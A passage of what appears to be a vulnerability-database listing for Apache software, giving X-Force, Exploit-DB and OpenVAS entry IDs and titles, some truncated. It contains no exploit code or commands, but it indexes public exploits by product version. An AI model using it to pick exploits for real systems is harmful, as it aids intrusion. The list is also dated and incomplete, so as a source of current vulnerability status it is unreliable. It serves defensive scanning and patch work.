5000| [16705] Apache mod_ssl format string attack
5001| [16524] Apache HTTP Server ap_get_mime_headers_core denial of service
5002| [16387] Apache HTTP Server mod_proxy Content-Length buffer overflow
5003| [16230] Apache HTTP Server PHP denial of service
5004| [16214] Apache mod_ssl ssl_util_uuencode_binary buffer overflow
5005| [15958] Apache HTTP Server authentication modules memory corruption
5006| [15547] Apache HTTP Server mod_disk_cache local information disclosure
5007| [15540] Apache HTTP Server socket starvation denial of service
5008| [15467] Novell GroupWise WebAccess using Apache Web server allows viewing of files on the server
5009| [15422] Apache HTTP Server mod_access information disclosure
5010| [15419] Apache HTTP Server mod_ssl plain HTTP request denial of service
5011| [15293] Apache for Cygwin "
5012| [15065] Apache-SSL has a default password
5013| [15041] Apache HTTP Server mod_digest module could allow an attacker to replay responses
5014| [15015] Apache httpd server httpd.conf could allow a local user to bypass restrictions
5015| [14751] Apache Mod_python output filter information disclosure
5016| [14125] Apache HTTP Server mod_userdir module information disclosure
5017| [14075] Apache HTTP Server mod_php file descriptor leak
5018| [13703] Apache HTTP Server account
5019| [13689] Apache HTTP Server configuration allows symlinks
5020| [13688] Apache HTTP Server configuration allows SSI
5021| [13687] Apache HTTP Server Server: header value
5022| [13685] Apache HTTP Server ServerTokens value
5023| [13684] Apache HTTP Server ServerSignature value
5024| [13672] Apache HTTP Server config allows directory autoindexing
5025| [13671] Apache HTTP Server default content
5026| [13670] Apache HTTP Server config file directive references outside content root
5027| [13668] Apache HTTP Server httpd not running in chroot environment
5028| [13666] Apache HTTP Server CGI directory contains possible command interpreter or compiler
5029| [13664] Apache HTTP Server config file contains ScriptAlias entry
5030| [13663] Apache HTTP Server CGI support modules loaded
5031| [13661] Apache HTTP Server config file contains AddHandler entry
5032| [13660] Apache HTTP Server 500 error page not CGI script
5033| [13659] Apache HTTP Server 413 error page not CGI script
5034| [13658] Apache HTTP Server 403 error page not CGI script
5035| [13657] Apache HTTP Server 401 error page not CGI script
5036| [13552] Apache HTTP Server mod_cgid module information disclosure
5037| [13550] Apache GET request directory traversal
5038| [13516] Apache Cocoon XMLForm and JXForm could allow execution of code
5039| [13499] Apache Cocoon directory traversal allows downloading of boot.ini file
5040| [13429] Apache Tomcat non-HTTP request denial of service
5041| [13400] Apache HTTP server mod_alias and mod_rewrite buffer overflow
5042| [13295] Apache weak password encryption
5043| [13254] Apache Tomcat .jsp cross-site scripting
5044| [13125] Apache::Gallery Inline::C could allow arbitrary code execution
5045| [13086] Apache Jakarta Tomcat mod_jk format string allows remote access
5046| [12681] Apache HTTP Server mod_proxy could allow mail relaying
5047| [12662] Apache HTTP Server rotatelogs denial of service
5048| [12554] Apache Tomcat stores password in plain text
5049| [12553] Apache HTTP Server redirects and subrequests denial of service
5050| [12552] Apache HTTP Server FTP proxy server denial of service
5051| [12551] Apache HTTP Server prefork MPM denial of service
5052| [12550] Apache HTTP Server weaker than expected encryption
5053| [12549] Apache HTTP Server type-map file denial of service
5054| [12206] Apache Tomcat /opt/tomcat directory insecure permissions
5055| [12102] Apache Jakarta Tomcat MS-DOS device name request denial of service
5056| [12091] Apache HTTP Server apr_password_validate denial of service
5057| [12090] Apache HTTP Server apr_psprintf code execution
5058| [11804] Apache HTTP Server mod_access_referer denial of service
5059| [11750] Apache HTTP Server could leak sensitive file descriptors
5060| [11730] Apache HTTP Server error log and access log terminal escape sequence injection
5061| [11703] Apache long slash path allows directory listing
5062| [11695] Apache HTTP Server LF (Line Feed) denial of service
5063| [11694] Apache HTTP Server filestat.c denial of service
5064| [11438] Apache HTTP Server MIME message boundaries information disclosure
5065| [11412] Apache HTTP Server error log terminal escape sequence injection
5066| [11196] Apache Tomcat examples and ROOT Web applications cross-site scripting
5067| [11195] Apache Tomcat web.xml could be used to read files
5068| [11194] Apache Tomcat URL appended with a null character could list directories
5069| [11139] Apache HTTP Server mass virtual hosting with mod_rewrite or mod_vhost_alias could allow an attacker to obtain files
5070| [11126] Apache HTTP Server illegal character file disclosure
5071| [11125] Apache HTTP Server DOS device name HTTP POST code execution
5072| [11124] Apache HTTP Server DOS device name denial of service
5073| [11088] Apache HTTP Server mod_vhost_alias CGI source disclosure
5074| [10938] Apache HTTP Server printenv test CGI cross-site scripting
5075| [10771] Apache Tomcat mod_jk module multiple HTTP GET request buffer overflow
5076| [10575] Apache mod_php module could allow an attacker to take over the httpd process
5077| [10499] Apache HTTP Server WebDAV HTTP POST view source
5078| [10457] Apache HTTP Server mod_ssl "
5079| [10415] Apache HTTP Server htdigest insecure system() call could allow command execution
5080| [10414] Apache HTTP Server htdigest multiple buffer overflows
5081| [10413] Apache HTTP Server htdigest temporary file race condition
5082| [10412] Apache HTTP Server htpasswd temporary file race condition
5083| [10376] Apache Tomcat invoker servlet used in conjunction with the default servlet reveals source code
5084| [10348] Apache Tomcat HTTP GET request DOS device reference could cause a denial of service
5085| [10281] Apache HTTP Server ab.c ApacheBench long response buffer overflow
5086| [10280] Apache HTTP Server shared memory scorecard overwrite
5087| [10263] Apache Tomcat mod_jk or mod_jserv connector directory disclosure
5088| [10241] Apache HTTP Server Host: header cross-site scripting
5089| [10230] Slapper worm variants A, B, and C target OpenSSL/Apache systems
5090| [10208] Apache HTTP Server mod_dav denial of service
5091| [10206] HP VVOS Apache mod_ssl denial of service
5092| [10200] Apache HTTP Server stderr denial of service
5093| [10175] Apache Tomcat org.apache.catalina.servlets.DefaultServlet reveals source code
5094| [10169] Slapper worm variant (Slapper.C) targets OpenSSL/Apache systems
5095| [10154] Slapper worm variant (Slapper.B) targets OpenSSL/Apache systems
5096| [10098] Slapper worm targets OpenSSL/Apache systems
5097| [9876] Apache HTTP Server cgi/cgid request could disclose the path to a requested script
5098| [9875] Apache HTTP Server .var file request could disclose installation path
5099| [9863] Apache Tomcat web.xml file could allow a remote attacker to bypass restrictions
5100| [9808] Apache HTTP Server non-Unix version URL encoded directory traversal
5101| [9623] Apache HTTP Server ap_log_rerror() path disclosure
5102| [9520] Apache Tomcat /servlet/ mapping cross-site scripting
5103| [9415] Apache HTTP Server mod_ssl .htaccess off-by-one buffer overflow
5104| [9396] Apache Tomcat null character to threads denial of service
5105| [9394] Apache Tomcat HTTP request for LPT9 reveals Web root path
5106| [9249] Apache HTTP Server chunked encoding heap buffer overflow
5107| [9208] Apache Tomcat sample file requests could reveal directory listing and path to Web root directory
5108| [8932] Apache Tomcat example class information disclosure
5109| [8633] Apache HTTP Server with mod_rewrite could allow an attacker to bypass directives
5110| [8629] Apache HTTP Server double-reverse DNS lookup spoofing
5111| [8589] Apache HTTP Server for Windows DOS batch file remote command execution
5112| [8457] Oracle9i Application Server Apache PL/SQL HTTP Location header buffer overflow
5113| [8455] Oracle9i Application Server default installation could allow an attacker to access certain Apache Services
5114| [8400] Apache HTTP Server mod_frontpage buffer overflows
5115| [8326] Apache HTTP Server multiple MIME headers (sioux) denial of service
5116| [8308] Apache "
5117| [8275] Apache HTTP Server with Multiviews enabled could disclose directory contents
5118| [8119] Apache and PHP OPTIONS request reveals "
5119| [8054] Apache is running on the system
5120| [8029] Mandrake Linux default Apache configuration could allow an attacker to browse files and directories
5121| [8027] Mandrake Linux default Apache configuration has remote management interface enabled
5122| [8026] Mandrake Linux Apache sample programs could disclose sensitive information about the server
5123| [7836] Apache HTTP Server log directory denial of service
5124| [7815] Apache for Windows "
5125| [7810] Apache HTTP request could result in unexpected behavior
5126| [7599] Apache Tomcat reveals installation path
5127| [7494] Apache "
5128| [7419] Apache Web Server could allow remote attackers to overwrite .log files
5129| [7363] Apache Web Server hidden HTTP requests
5130| [7249] Apache mod_proxy denial of service
5131| [7129] Linux with Apache Web server could allow an attacker to determine if a specified username exists
5132| [7103] Apple Mac OS X used with Apache Web server could disclose directory contents
5133| [7059] Apache "
5134| [7057] Apache "
5135| [7056] Apache "
5136| [7055] Apache "
5137| [7054] Apache "
5138| [6997] Apache Jakarta Tomcat error message may reveal information
5139| [6971] Apache Jakarta Tomcat may reveal JSP source code with missing HTTP protocol specification
5140| [6970] Apache crafted HTTP request could reveal the internal IP address
5141| [6921] Apache long slash path allows directory listing
5142| [6687] Apple Mac OS X used with Apache Web server could allow arbitrary file disclosure
5143| [6527] Apache Web Server for Windows and OS2 denial of service
5144| [6316] Apache Jakarta Tomcat may reveal JSP source code
5145| [6305] Apache Jakarta Tomcat directory traversal
5146| [5926] Linux Apache symbolic link
5147| [5659] Apache Web server discloses files when used with php script
5148| [5310] Apache mod_rewrite allows attacker to view arbitrary files
5149| [5204] Apache WebDAV directory listings
5150| [5197] Apache Web server reveals CGI script source code
5151| [5160] Apache Jakarta Tomcat default installation
5152| [5099] Trustix Secure Linux installs Apache with world writable access
5153| [4968] Apache Jakarta Tomcat snoop servlet gives out information which could be used in attack
5154| [4967] Apache Jakarta Tomcat 404 error reveals the pathname of the requested file
5155| [4931] Apache source.asp example file allows users to write to files
5156| [4575] IBM HTTP Server running Apache allows users to directory listing and file retrieval
5157| [4205] Apache Jakarta Tomcat delivers file contents
5158| [2084] Apache on Debian by default serves the /usr/doc directory
5159| [1630] MessageMedia UnityMail and Apache Web server MIME header flood denial of service
5160| [697] Apache HTTP server beck exploit
5161| [331] Apache cookies buffer overflow
5162|
5163| Exploit-DB - https://www.exploit-db.com:
5164| [31130] Apache Tomcat <= 6.0.15 Cookie Quote Handling Remote Information Disclosure Vulnerability
5165| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
5166| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
5167| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
5168| [30563] Apache Tomcat <= 5.5.15 Cal2.JSP Cross-Site Scripting Vulnerability
5169| [30496] Apache Tomcat <= 6.0.13 Cookie Handling Quote Delimiter Session ID Disclosure
5170| [30495] Apache Tomcat <= 6.0.13 Host Manager Servlet Cross Site Scripting Vulnerability
5171| [30191] Apache MyFaces Tomahawk JSF Framework 1.1.5 Autoscroll Parameter Cross Site Scripting Vulnerability
5172| [30189] Apache Tomcat <= 6.0.13 JSP Example Web Applications Cross Site Scripting Vulnerability
5173| [30052] Apache Tomcat 6.0.10 Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
5174| [29930] Apache AXIS 1.0 Non-Existent WSDL Path Information Disclosure Vulnerability
5175| [29859] Apache Roller OGNL Injection
5176| [29739] Apache HTTP Server Tomcat 5.x/6.0.x Directory Traversal Vulnerability
5177| [29435] Apache Tomcat 5.5.25 - CSRF Vulnerabilities
5178| [29316] Apache + PHP 5.x - Remote Code Execution (Multithreaded Scanner) (2)
5179| [29290] Apache / PHP 5.x Remote Code Execution Exploit
5180| [28713] Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE
5181| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
5182| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
5183| [28254] Apache Tomcat 5 Information Disclosure Vulnerability
5184| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
5185| [27397] Apache suEXEC Privilege Elevation / Information Disclosure
5186| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
5187| [27096] Apache Geronimo 1.0 Error Page XSS
5188| [27095] Apache Tomcat / Geronimo 1.0 Sample Script cal2.jsp time Parameter XSS
5189| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
5190| [26542] Apache Struts 1.2.7 Error Response Cross-Site Scripting Vulnerability
5191| [25986] Plesk Apache Zeroday Remote Exploit
5192| [25980] Apache Struts includeParams Remote Code Execution
5193| [25625] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (2)
5194| [25624] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (1)
5195| [24874] Apache Struts ParametersInterceptor Remote Code Execution
5196| [24744] Apache Rave 0.11 - 0.20 - User Information Disclosure
5197| [24694] Apache 1.3.x mod_include Local Buffer Overflow Vulnerability
5198| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
5199| [23751] Apache Cygwin 1.3.x/2.0.x Directory Traversal Vulnerability
5200| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
5201| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
5202| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
5203| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
5204| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
5205| [23245] Apache Tomcat 4.0.x Non-HTTP Request Denial of Service Vulnerability
5206| [23119] Apache::Gallery 0.4/0.5/0.6 Insecure Local File Storage Privilege Escalation Vulnerability
5207| [22505] Apache Mod_Access_Referer 1.0.2 NULL Pointer Dereference Denial of Service Vulnerability
5208| [22205] Apache Tomcat 3.x Null Byte Directory/File Disclosure Vulnerability
5209| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
5210| [22068] Apache 1.3.x,Tomcat 4.0.x/4.1.x Mod_JK Chunked Encoding Denial of Service Vulnerability
5211| [21885] Apache 1.3/2.0.x Server Side Include Cross Site Scripting Vulnerability
5212| [21882] Apache Tomcat 3.2 Directory Disclosure Vulnerability
5213| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
5214| [21853] Apache Tomcat 3/4 DefaultServlet File Disclosure Vulnerability
5215| [21734] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
5216| [21719] Apache 2.0 Path Disclosure Vulnerability
5217| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
5218| [21605] Apache Tomcat 4.0.3 DoS Device Name Cross Site Scripting Vulnerability
5219| [21604] Apache Tomcat 4.0.3 Servlet Mapping Cross Site Scripting Vulnerability
5220| [21560] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (2)
5221| [21559] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (1)
5222| [21534] Apache Tomcat 3/4 JSP Engine Denial of Service Vulnerability
5223| [21492] Apache Tomcat 3.2.3/3.2.4 RealPath.JSP Malformed Request Information Disclosure
5224| [21491] Apache Tomcat 3.2.3/3.2.4 Example Files Web Root Path Disclosure
5225| [21490] Apache Tomcat 3.2.3/3.2.4 Source.JSP Malformed Request Information Disclosure
5226| [21412] Apache Tomcat 4.0/4.1 Servlet Path Disclosure Vulnerability
5227| [21350] Apache Win32 1.3.x/2.0.x Batch File Remote Command Execution Vulnerability
5228| [21204] Apache 1.3.20 Win32 PHP.EXE Remote File Disclosure Vulnerability
5229| [21112] Red Hat Linux 7.0 Apache Remote Username Enumeration Vulnerability
5230| [21067] Apache 1.0/1.2/1.3 Server Address Disclosure Vulnerability
5231| [21002] Apache 1.3 Possible Directory Index Disclosure Vulnerability
5232| [20911] Apache 1.3.14 Mac File Protection Bypass Vulnerability
5233| [20716] apache tomcat 3.0 - Directory Traversal vulnerability
5234| [20695] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (4)
5235| [20694] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (3)
5236| [20693] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (2)
5237| [20692] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (1)
5238| [20595] NCSA 1.3/1.4.x/1.5,Apache httpd 0.8.11/0.8.14 ScriptAlias Source Retrieval Vulnerability
5239| [20558] Apache 1.2 Web Server DoS Vulnerability
5240| [20466] Apache 1.3 Web Server with Php 3 File Disclosure Vulnerability
5241| [20435] Apache 0.8.x/1.0.x,NCSA httpd 1.x test-cgi Directory Listing Vulnerability
5242| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
5243| [20210] Apache 1.3.12 WebDAV Directory Listings Vulnerability
5244| [20131] Apache Tomcat 3.1 Path Revealing Vulnerability
5245| [19975] Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 Root Directory Access Vulnerability
5246| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
5247| [19536] Apache <= 1.1,NCSA httpd <= 1.5.2,Netscape Server 1.12/1.1/2.0 a nph-test-cgi Vulnerability
5248| [19231] PHP apache_request_headers Function Buffer Overflow
5249| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
5250| [18897] Oracle Weblogic Apache Connector POST Request Buffer Overflow
5251| [18619] Apache Tomcat Remote Exploit (PUT Request) and Account Scanner
5252| [18452] Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities
5253| [18442] Apache httpOnly Cookie Disclosure
5254| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
5255| [18221] Apache HTTP Server Denial of Service
5256| [17969] Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC
5257| [17696] Apache httpd Remote Denial of Service (memory exhaustion)
5258| [17691] Apache Struts < 2.2.0 - Remote Command Execution
5259| [16798] Apache mod_jk 1.2.20 Buffer Overflow
5260| [16782] Apache Win32 Chunked Encoding
5261| [16752] Apache module mod_rewrite LDAP protocol Buffer Overflow
5262| [16317] Apache Tomcat Manager Application Deployer Authenticated Code Execution
5263| [15710] Apache Archiva 1.0 - 1.3.1 CSRF Vulnerability
5264| [15319] Apache 2.2 (Windows) Local Denial of Service
5265| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
5266| [14489] Apache Tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
5267| [12721] Apache Axis2 1.4.1 - Local File Inclusion Vulnerability
5268| [12689] Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console
5269| [12343] Apache Tomcat 5.5.0 to 5.5.29 & 6.0.0 to 6.0.26 - Information Disclosure Vulnerability
5270| [12330] Apache OFBiz - Multiple XSS
5271| [12264] Apache OFBiz - FULLADMIN Creator PoC Payload
5272| [12263] Apache OFBiz - SQL Remote Execution PoC Payload
5273| [11662] Apache Spamassassin Milter Plugin Remote Root Command Execution
5274| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
5275| [10811] Joomla.Tutorials GHDB: Apache directory listing Download Vulnerability
5276| [10292] Apache Tomcat 3.2.1 - 404 Error Page Cross Site Scripting Vulnerability
5277| [9995] Apache Tomcat Form Authentication Username Enumeration Weakness
5278| [9994] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
5279| [9993] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
5280| [8842] Apache mod_dav / svn Remote Denial of Service Exploit
5281| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
5282| [7264] Apache Tomcat runtime.getRuntime().exec() Privilege Escalation (win)
5283| [6229] apache tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
5284| [6100] Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
5285| [6089] Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
5286| [5386] Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit
5287| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
5288| [4552] Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)
5289| [4530] Apache Tomcat (webdav) Remote File Disclosure Exploit
5290| [4162] Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)
5291| [4093] Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit
5292| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
5293| [3680] Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
5294| [3384] Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit
5295| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
5296| [2061] Apache Tomcat < 5.5.17 Remote Directory Listing Vulnerability
5297| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
5298| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
5299| [764] Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c)
5300| [587] Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit
5301| [466] htpasswd Apache 1.3.31 - Local Exploit
5302| [371] Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)
5303| [360] Apache HTTPd Arbitrary Long HTTP Headers DoS
5304| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
5305| [126] Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit
5306| [67] Apache 1.3.x mod_mylo Remote Code Execution Exploit
5307| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
5308| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
5309| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
5310| [9] Apache HTTP Server 2.x Memory Leak Exploit
5311|
5312| OpenVAS (Nessus) - http://www.openvas.org:
5313| [902924] Apache Struts2 Showcase Skill Name Remote Code Execution Vulnerability
5314| [902837] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability (Windows)
5315| [902830] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
5316| [902664] Apache Traffic Server HTTP Host Header Denial of Service Vulnerability
5317| [901203] Apache httpd Web Server Range Header Denial of Service Vulnerability
5318| [901110] Apache ActiveMQ Source Code Information Disclosure Vulnerability
5319| [901105] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
5320| [900842] Apache 'mod_proxy_ftp' Module Command Injection Vulnerability (Linux)
5321| [900841] Apache 'mod_proxy_ftp' Module Denial Of Service Vulnerability (Linux)
5322| [900573] Apache APR-Utils XML Parser Denial of Service Vulnerability
5323| [900572] Apache APR-Utils Multiple Denial of Service Vulnerabilities
5324| [900571] Apache APR-Utils Version Detection
5325| [900499] Apache mod_proxy_ajp Information Disclosure Vulnerability
5326| [900496] Apache Tiles Multiple XSS Vulnerability
5327| [900493] Apache Tiles Version Detection
5328| [900107] Apache mod_proxy_ftp Wildcard Characters XSS Vulnerability
5329| [900021] Apache Tomcat Cross-Site Scripting and Security Bypass Vulnerabilities
5330| [880086] CentOS Update for apache CESA-2008:0004-01 centos2 i386
5331| [870175] RedHat Update for apache RHSA-2008:0004-01
5332| [864591] Fedora Update for apache-poi FEDORA-2012-10835
5333| [864383] Fedora Update for apache-commons-compress FEDORA-2012-8428
5334| [864280] Fedora Update for apache-commons-compress FEDORA-2012-8465
5335| [864250] Fedora Update for apache-poi FEDORA-2012-7683
5336| [864249] Fedora Update for apache-poi FEDORA-2012-7686
5337| [863993] Fedora Update for apache-commons-daemon FEDORA-2011-10880
5338| [863466] Fedora Update for apache-commons-daemon FEDORA-2011-10936
5339| [855821] Solaris Update for Apache 1.3 122912-19
5340| [855812] Solaris Update for Apache 1.3 122911-19
5341| [855737] Solaris Update for Apache 1.3 122911-17
5342| [855731] Solaris Update for Apache 1.3 122912-17
5343| [855695] Solaris Update for Apache 1.3 122911-16
5344| [855645] Solaris Update for Apache 1.3 122912-16
5345| [855587] Solaris Update for kernel update and Apache 108529-29
5346| [855566] Solaris Update for Apache 116973-07
5347| [855531] Solaris Update for Apache 116974-07
5348| [855524] Solaris Update for Apache 2 120544-14
5349| [855494] Solaris Update for Apache 1.3 122911-15
5350| [855478] Solaris Update for Apache Security 114145-11
5351| [855472] Solaris Update for Apache Security 113146-12
5352| [855179] Solaris Update for Apache 1.3 122912-15
5353| [855147] Solaris Update for kernel update and Apache 108528-29
5354| [855077] Solaris Update for Apache 2 120543-14
5355| [850196] SuSE Update for apache2 openSUSE-SU-2012:0314-1 (apache2)
5356| [850088] SuSE Update for apache2 SUSE-SA:2007:061
5357| [850009] SuSE Update for apache2,apache SUSE-SA:2008:021
5358| [841209] Ubuntu Update for apache2 USN-1627-1
5359| [840900] Ubuntu Update for apache2 USN-1368-1
5360| [840798] Ubuntu Update for apache2 USN-1259-1
5361| [840734] Ubuntu Update for apache2 USN-1199-1
5362| [840542] Ubuntu Update for apache2 vulnerabilities USN-1021-1
5363| [840504] Ubuntu Update for apache2 vulnerability USN-990-2
5364| [840399] Ubuntu Update for apache2 vulnerabilities USN-908-1
5365| [840304] Ubuntu Update for apache2 vulnerabilities USN-575-1
5366| [840118] Ubuntu Update for libapache2-mod-perl2 vulnerability USN-488-1
5367| [840092] Ubuntu Update for apache2 vulnerabilities USN-499-1
5368| [840039] Ubuntu Update for libapache2-mod-python vulnerability USN-430-1
5369| [835253] HP-UX Update for Apache Web Server HPSBUX02645
5370| [835247] HP-UX Update for Apache-based Web Server HPSBUX02612
5371| [835243] HP-UX Update for Apache Running Tomcat Servlet Engine HPSBUX02579
5372| [835236] HP-UX Update for Apache with PHP HPSBUX02543
5373| [835233] HP-UX Update for Apache-based Web Server HPSBUX02531
5374| [835224] HP-UX Update for Apache-based Web Server HPSBUX02465
5375| [835200] HP-UX Update for Apache Web Server Suite HPSBUX02431
5376| [835190] HP-UX Update for Apache Web Server Suite HPSBUX02401
5377| [835188] HP-UX Update for Apache HPSBUX02308
5378| [835181] HP-UX Update for Apache With PHP HPSBUX02332
5379| [835180] HP-UX Update for Apache with PHP HPSBUX02342
5380| [835172] HP-UX Update for Apache HPSBUX02365
5381| [835168] HP-UX Update for Apache HPSBUX02313
5382| [835148] HP-UX Update for Apache HPSBUX01064
5383| [835139] HP-UX Update for Apache with PHP HPSBUX01090
5384| [835131] HP-UX Update for Apache HPSBUX00256
5385| [835119] HP-UX Update for Apache Remote Execution of Arbitrary Code HPSBUX02186
5386| [835104] HP-UX Update for Apache HPSBUX00224
5387| [835103] HP-UX Update for Apache mod_cgid HPSBUX00301
5388| [835101] HP-UX Update for Apache HPSBUX01232
5389| [835080] HP-UX Update for Apache HPSBUX02273
5390| [835078] HP-UX Update for ApacheStrong HPSBUX00255
5391| [835044] HP-UX Update for Apache HPSBUX01019
5392| [835040] HP-UX Update for Apache PHP HPSBUX00207
5393| [835025] HP-UX Update for Apache HPSBUX00197
5394| [835023] HP-UX Update for Apache HPSBUX01022
5395| [835022] HP-UX Update for Apache HPSBUX02292
5396| [835005] HP-UX Update for Apache HPSBUX02262
5397| [831759] Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)
5398| [831737] Mandriva Update for apache MDVSA-2012:154-1 (apache)
5399| [831534] Mandriva Update for apache MDVSA-2012:012 (apache)
5400| [831523] Mandriva Update for apache MDVSA-2012:003 (apache)
5401| [831491] Mandriva Update for apache MDVSA-2011:168 (apache)
5402| [831460] Mandriva Update for apache MDVSA-2011:144 (apache)
5403| [831449] Mandriva Update for apache MDVSA-2011:130 (apache)
5404| [831357] Mandriva Update for apache MDVSA-2011:057 (apache)
5405| [831132] Mandriva Update for apache MDVSA-2010:153 (apache)
5406| [831131] Mandriva Update for apache MDVSA-2010:152 (apache)
5407| [830989] Mandriva Update for apache-mod_auth_shadow MDVSA-2010:081 (apache-mod_auth_shadow)
5408| [830931] Mandriva Update for apache MDVSA-2010:057 (apache)
5409| [830926] Mandriva Update for apache MDVSA-2010:053 (apache)
5410| [830918] Mandriva Update for apache-mod_security MDVSA-2010:050 (apache-mod_security)
5411| [830799] Mandriva Update for apache-conf MDVSA-2009:300-2 (apache-conf)
5412| [830797] Mandriva Update for apache-conf MDVSA-2009:300-1 (apache-conf)
5413| [830791] Mandriva Update for apache-conf MDVA-2010:011 (apache-conf)
5414| [830652] Mandriva Update for apache MDVSA-2008:195 (apache)
5415| [830621] Mandriva Update for apache-conf MDVA-2008:129 (apache-conf)
5416| [830581] Mandriva Update for apache MDVSA-2008:016 (apache)
5417| [830294] Mandriva Update for apache MDKSA-2007:140 (apache)
5418| [830196] Mandriva Update for apache MDKSA-2007:235 (apache)
5419| [830112] Mandriva Update for apache MDKSA-2007:127 (apache)
5420| [830109] Mandriva Update for apache-mod_perl MDKSA-2007:083 (apache-mod_perl)
5421| [802425] Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability
5422| [802423] Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities
5423| [802422] Apache Struts Showcase Multiple Persistence Cross-Site Scripting Vulnerabilities
5424| [802415] Apache Tomcat Multiple Security Bypass Vulnerabilities (Win)
5425| [802385] Apache Tomcat Request Object Security Bypass Vulnerability (Win)
5426| [802384] Apache Tomcat Parameter Handling Denial of Service Vulnerability (Win)
5427| [802378] Apache Tomcat Hash Collision Denial Of Service Vulnerability
5428| [801942] Apache Archiva Multiple Vulnerabilities
5429| [801940] Apache Struts2 'XWork' Information Disclosure Vulnerability
5430| [801663] Apache Struts2/XWork Remote Command Execution Vulnerability
5431| [801521] Apache APR-util 'buckets/apr_brigade.c' Denial Of Service Vulnerability
5432| [801284] Apache Derby Information Disclosure Vulnerability
5433| [801203] Apache ActiveMQ Persistent Cross-Site Scripting Vulnerability
5434| [800837] Apache 'mod_deflate' Denial Of Service Vulnerability - July09
5435| [800827] Apache 'mod_proxy_http.c' Denial Of Service Vulnerability
5436| [800680] Apache APR Version Detection
5437| [800679] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
5438| [800678] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
5439| [800677] Apache Roller Version Detection
5440| [800279] Apache mod_jk Module Version Detection
5441| [800278] Apache Struts Cross Site Scripting Vulnerability
5442| [800277] Apache Tomcat mod_jk Information Disclosure Vulnerability
5443| [800276] Apache Struts Version Detection
5444| [800271] Apache Struts Directory Traversal Vulnerability
5445| [800024] Apache Tomcat RemoteFilterValve Security Bypass Vulnerability
